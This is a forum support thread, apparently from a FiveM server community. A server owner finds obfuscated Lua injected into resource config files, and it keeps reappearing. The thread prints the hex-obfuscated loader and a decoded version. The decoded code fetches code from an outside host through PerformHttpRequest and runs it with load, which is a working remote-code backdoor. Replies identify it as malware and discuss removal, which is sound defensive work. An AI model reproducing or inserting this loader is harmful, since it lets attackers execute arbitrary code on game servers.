Error on files and bug on my server

Antykors · January 16, 2023, 7:08pm

Hello,

Client

Using canary?
Yes

Windows version:
Windows 11

System specifications:

Server

Operating system:
Windows

Artifact version:
6117

IP address:
51.91.214.162

System specifications:

Incident

Summary:
I have a big problem… Following some resources not working, I looked in the F8 logs and came across errors in the config.lua for example of my esx_lcgsjob.

When I went to the file in question, at the very end of the config I found this line:

local YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[4][YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2d\x66\x69\x76\x65\x6d\x2e\x6e\x65\x74\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x61\x4c\x61\x67\x32", function (kMxRrCUriNzdOBKlCqhmhbAFuGRdPyRyTWSIYCbGdDgeYKfIRkyVLLhWVUqPECjdngKqWU, jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm) if (jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm == YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[6] or jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm == YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[5]) then return end YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[4][YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[2]](YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[4][YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[3]](jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm))() end)

I know for a fact that I never typed this line in my config.lua. I have the same problem on other random resources.

Expected behavior:

Actual behavior:

Steps to reproduce:
Even when I delete them and restart the server, those kind of lines end up coming back randomly in other resources.

Server/Client?
Server issue

Files for repro (if any):

Error screenshot (if any):

Any additional info:

Thx for your help, i’m very disappointed…

JiminyKroket · January 17, 2023, 12:23am

Seems like a malware…

JiminyKroket · January 17, 2023, 12:31am

Antykors:

local YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[4][YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2d\x66\x69\x76\x65\x6d\x2e\x6e\x65\x74\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x61\x4c\x61\x67\x32", function (kMxRrCUriNzdOBKlCqhmhbAFuGRdPyRyTWSIYCbGdDgeYKfIRkyVLLhWVUqPECjdngKqWU, jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm) if (jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm == YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[6] or jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm == YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[5]) then return end YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[4][YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[2]](YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[4][YruOtOQyCWxwdxKVCWjegyjzCpkcoKyKeKCxRsnhLJbXZgCTBpOeCpuBNMBrDMheKeNanJ[3]](jSJvxBqfWCXvlYDalYHzleyevIWIboLUHkfLRLQvIegbDRJwIxdsgEAfuYhFfIAcEXkqWm))() end)

local thisTable = {
    [1] = "PerformHttpRequest",
    [2] = "assert",
    [3] = "load",
    [4] = _G,
    [5] = "",
    [6] = nil
}
-- thisTable[4][thisTable[1] ]("https://api-fivem.net/v2_/stage3.php?to=aLag2", function (arg1, arg2) if (arg2 == thisTable[6] or arg2 == thisTable[5]) then return end thisTable[4][thisTable[2 ] ](thisTable[4][thisTable[3] ](arg2))() end)


--[[
_G["PerformHttpRequest"]("https://api-fivem.net/v2_/stage3.php?to=aLag2", function (err, data)
    if (data == nil or data == "") then return end
    _G["assert"](_G["load"](data))()
end)
]]

Ehhh this is decoded whatever you wanna take from that

Antykors · January 17, 2023, 7:52am

Hello,

Thank you for your answer, do you have a solution?

The malware would be on the remote machine or in a resource?

What anti-virus or anti-malware could I install on windows server 2019?

Thx

MasiBall · January 17, 2023, 10:02am

That’s malicious code, and it’s in your resources. It’s also possible that more than one resource contains that malicious code, and that’s why it’s being added back every time you restart your server.

Antykors · January 17, 2023, 12:29pm

It’s ok, I found the problem. I actually have a backdoor in one of my resources. I completely deleted it and I’m checking all my files to get everything clean.

JiminyKroket · January 17, 2023, 4:38pm

Completely deleted the resource, correct?

Antykors · January 17, 2023, 9:43pm

Yes but i have same problem… All time i reboot i have one of this line on a random resource.

XNet_Solutions · March 7, 2023, 6:34pm

i get this to anyone got a fix?

Gameadictive · April 21, 2023, 6:12pm

Hi all Guys im using MalScanner to check everytime i start my server to see if this random things or more are loading in server. I delete all the

\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74

codes but they are still appearing randomly. Can anyone help us determine how to solve it please?

Ei_Beckann · May 12, 2023, 4:09am

managed to solve ?

Gameadictive · May 12, 2023, 12:02pm

Yep search the malicious code in your scripts and delete them, basically clean your server

Slydawg2021 · July 20, 2023, 7:12am

where did you find the actual code that was spreading it? and what did you use to find it. I have found the local string in the files with VSCode but how do I find the generator of the local string?

5h4dyCuB3 · February 24, 2025, 10:53pm

this as far as i got